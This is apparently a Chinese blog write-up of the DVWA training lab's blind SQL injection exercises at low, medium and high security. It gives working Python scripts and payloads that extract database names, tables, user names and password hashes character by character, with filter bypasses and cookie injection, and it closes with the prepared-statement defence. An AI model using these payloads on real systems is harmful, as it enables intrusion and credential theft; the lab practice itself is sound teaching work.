码迷,mamicode.com
首页 > 数据库 > 详细

sql盲注

时间:2020-11-11 15:55:23      阅读:15      评论:0      收藏:0      [点我收藏+]

标签:linux   pen   art   数据库名   tco   url   输入   abi   时间   

sql盲注

low

构造 1and 1=2 回显 User ID exists in the database.,说明是字符型注入

构造 1‘ 回显 User ID is MISSING from the database.

构造 1‘ -- + User ID exists in the database. ,说明执行语句 select * from [table_name]

where id=‘‘

构造 1‘ and 1=2-- + 回显User ID is MISSING from the database.

综上,查询正确时,回显 User ID exists in the database.

查询为假或者语法错误时,回显 User ID is MISSING from the database.

构造 1‘ and ascii(substr(database(),1,1))<128 -- + 回显正常

直接上脚本,注意这里要加请求头,因为有cookie之类的

import requests
import sys

url=‘http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/‘

headers={
"Host":"127.0.0.1",

"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",

"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",

"Accept-Encoding":"gzip, deflate",

"Referer":"http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/",

"Cookie":"security=low; PHPSESSID=j62fsi5l43enqvbis9rvgva7h8",

"Connection":"close",

"Upgrade-Insecure-Requests":"1"
}
#sql="1‘ and substr(database(),{0},1)=‘{1}‘-- +" 爆数据库名
#sql="1‘ and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)=‘{1}‘-- +"爆表名
#sql="1‘ and substr((select group_concat(column_name)from information_schema.columns where table_name=‘users‘),{0},1)=‘{1}‘ -- +"爆users中列名
#sql="1‘ and substr((select group_concat(password) from users),{0},1)=‘{1}‘-- +"爆users.password中具体内容
sql="1‘ and substr((select group_concat(user) from users),{0},1)=‘{1}‘-- +"爆users.user中具体内容

flag=‘‘ 

for i in range(1,250):

	print(‘guess‘,str(i))

	for ch in range(32,129):

		if ch==128:

			sys.exit(0)

		sqli=sql.format(i,chr(ch))

		params={"id":sqli,"Submit":"Submit"}

		response=requests.get(url,params=params,headers=headers).text

		if "User ID exists in the database" in response:

			flag+=chr(ch)

			print(flag)

			break

数据库:dvwa

表名:guestbook,users

users中列名:user,current_connections,total_connections,id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

users.password中具体字段:

81dc9bdb52d04dc20036dbd8313ed055,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

users.user中具体字段:

admin,gordonb,1337,pablo,smithy

注意脚本跑出来的是大写,实际上是小写

medium

抓包,发现是POST提交方式,直接改id的值

构造id=1 and 1=2 回显User ID is MISSING from the database. 说明是数字型注入

构造id=1 and ascii(substr(database(),1,1))<128 回显User ID exists in the database.

构造1‘‘‘‘回显User ID is MISSING from the database.

综上说明

查询正确时回显User ID exists in the database.

查询为假或者语法错误时回显User ID is MISSING from the database.

import requests
import sys

url=‘http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/‘

headers={
"Host": "127.0.0.1",

"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",

"Accept-Encoding": "gzip, deflate",

"Referer": "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/",

"Content-Type": "application/x-www-form-urlencoded",

"Content-Length": "22",

"Cookie": "security=medium; PHPSESSID=6m4uufmq1bchingfrnih933okc",

"Connection": "close",

"Upgrade-Insecure-Requests": "1"
}
#sql="1 and ascii(substr(database(),{0},1))={1}-- +" 

#sql="1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
#sql="1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
#sql="1 and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
sql="1 and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"

flag=‘‘ 

for i in range(1,250):

	print(‘guess‘,str(i))

	for ch in range(32,129):

		if ch==128:

			sys.exit(0)

		sqli=sql.format(i,ch)

		params={"id":sqli,"Submit":"Submit"}

		response=requests.post(url,data=params,headers=headers).text

		if "User ID exists in the database" in response:

			flag+=chr(ch)

			print(flag)

			break

这里跟Low脚本不同的是

sql="1 and ascii(substr(database(),{0},1))={1}-- +"

sql="1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
sql="1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
sql="1 and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
sql="1 and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"

可以看到查询语句中没有出现‘,如果用

1 and substr(database(),{0},1)=‘{1}‘-- +

无论如何都爆不出数据库,这时怀疑是过滤了某些字符,测试得知是单引号,然后我们写成

1 and ascii(substr(database(),{0},1))={1}-- +

实现绕过,并且在后来的

1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +

用16进制绕过‘users‘的分号书写

high

进去页面,我们点击那个那个按钮,弹出一个窗口

构造1 在原页面回显User ID exists in the database.

构造 1 and 1=2 在原页面回显User ID exists in the database.

构造 1‘ 原页面回显User ID is MISSING from the database.,并且此时返回时间有延迟

构造1‘ -- +原页面回显User ID exists in the database.

构造1‘ and 1=2 原页面回显User ID is MISSING from the database. 并且返回时间有延迟

构造1‘ and ascii(substr(database(),1,1))<128 -- + 原页面回显User ID exists in the database.

综上,我们猜测后台执行语句类似select * from [table_name] where id=‘‘

查询为真时,原回显User ID exists in the database.

查询为假或者语法错误时,原页面回显User ID is MISSING from the database.

我们猜测,在弹出的框中输入的值,是控制查询语句的where字句,以怎样的方式传递,我们抓包分析

技术图片
技术图片

我们发现post区域id就是我们输入的值,然后再forward一下

技术图片
技术图片

这时cookie里多了个id值,并且是我们Post区域内的,所以可以判定在弹出内的框框里输入的值会以cookie的形式赋值给原页面,然后通过这个cookie里的id值进行查询,我们只需改变cookie里的Id值即可实现sql注入

源代码cookie-input.php

<?php

define( ‘DVWA_WEB_PAGE_TO_ROOT‘, ‘../../‘ );

require_once DVWA_WEB_PAGE_TO_ROOT . ‘dvwa/includes/dvwaPage.inc.php‘;

dvwaPageStartup( array( ‘authenticated‘, ‘phpids‘ ) );

$page = dvwaPageNewGrab();

$page[ ‘title‘ ] = ‘Blind SQL Injection Cookie Input‘ . $page[ ‘title_separator‘ ].$page[ ‘title‘ ];

if( isset( $_POST[ ‘id‘ ] ) ) {

	setcookie( ‘id‘, $_POST[ ‘id‘ ]);

	$page[ ‘body‘ ] .= "Cookie ID set!<br /><br /><br />";

	$page[ ‘body‘ ] .= "<script>window.opener.location.reload(true);</script>";

}

$page[ ‘body‘ ] .= "

<form action=\"#\" method=\"POST\">

	<input type=\"text\" size=\"15\" name=\"id\">

	<input type=\"submit\" name=\"Submit\" value=\"Submit\">

</form>

<hr />

<br />



<button onclick=\"self.close();\">Close</button>";



dvwaSourceHtmlEcho( $page );



?>




可以看到将$_POST[‘id‘]设置成了一个cookie值取名为id

代码high.php

<?php

if( isset( $_COOKIE[ ‘id‘ ] ) ) {

	// Get input

	$id = $_COOKIE[ ‘id‘ ];

	// Check database

	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘ LIMIT 1;";

	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed ‘or die‘ to suppress mysql errors

	// Get results

	$num = @mysqli_num_rows( $result ); // The ‘@‘ character suppresses errors

	if( $num > 0 ) {

		// Feedback for end user

		$html .= ‘<pre>User ID exists in the database.</pre>‘;

	}

	else {

		// Might sleep a random amount

		if( rand( 0, 5 ) == 3 ) {

			sleep( rand( 2, 4 ) );

		}

		// User wasn‘t found, so the page wasn‘t!

		header( $_SERVER[ ‘SERVER_PROTOCOL‘ ] . ‘ 404 Not Found‘ );

		// Feedback for end user

		$html .= ‘<pre>User ID is MISSING from the database.</pre>‘;

	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

?>

发现,将$_COOKIE[‘id‘]赋值给了$id,并执行查询语句,当我们查询为假或者语法错误时,会有一个sleep(2,4),这样从某种程度上就扰乱了时间盲注,只有当sleep(5)时,才会消除影响,但是这样时间要用很久,所以选择布尔盲注

上脚本

import requests
import sys

url=‘http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/‘

headers={
"Host": "127.0.0.1",

"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",

"Accept-Encoding": "gzip, deflate",

"Referer": "http://127.0.0.1/dvwa/security.php",

"Connection": "close",

"Upgrade-Insecure-Requests": "1",

"Pragma": "no-cache",

"Cache-Control": "no-cache"
}
sql="1‘ and ascii(substr(database(),{0},1))={1}-- +" 

#sql="1‘ and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
#sql="1‘ and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
#sql="1‘ and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
#sql="1‘ and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"

flag=‘‘ 

for i in range(1,250):

	print(‘guess‘,str(i))

	for ch in range(32,129):

		if ch==128:

			sys.exit(0)

		headers[‘Cookie‘]="id="+sql.format(i,ch)+"; security=high; PHPSESSID=6m4uufmq1bchingfrnih933okc"

		response=requests.get(url,headers=headers).text

		if "User ID exists in the database" in response:

			flag+=chr(ch)

			print(flag)

			break

impossible

<?php

if( isset( $_GET[ ‘Submit‘ ] ) ) {

	// Check Anti-CSRF token

	checkToken( $_REQUEST[ ‘user_token‘ ], $_SESSION[ ‘session_token‘ ], ‘index.php‘ );

	// Get input

	$id = $_GET[ ‘id‘ ];

	// Was a number entered?

	if(is_numeric( $id )) {

		// Check the database

		$data = $db->prepare( ‘SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;‘ );

		$data->bindParam( ‘:id‘, $id, PDO::PARAM_INT );

		$data->execute();

		// Get results

		if( $data->rowCount() == 1 ) {

			// Feedback for end user

			$html .= ‘<pre>User ID exists in the database.</pre>‘;

		}

		else {

			// User wasn‘t found, so the page wasn‘t!

			header( $_SERVER[ ‘SERVER_PROTOCOL‘ ] . ‘ 404 Not Found‘ );



			// Feedback for end user

			$html .= ‘<pre>User ID is MISSING from the database.</pre>‘;

		}

	}

}

// Generate Anti-CSRF token

generateSessionToken();

?>

可以看到用了PDO技术,御防了sql注入

sql盲注

标签:linux   pen   art   数据库名   tco   url   输入   abi   时间   

原文地址:https://www.cnblogs.com/NineOne/p/13764222.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!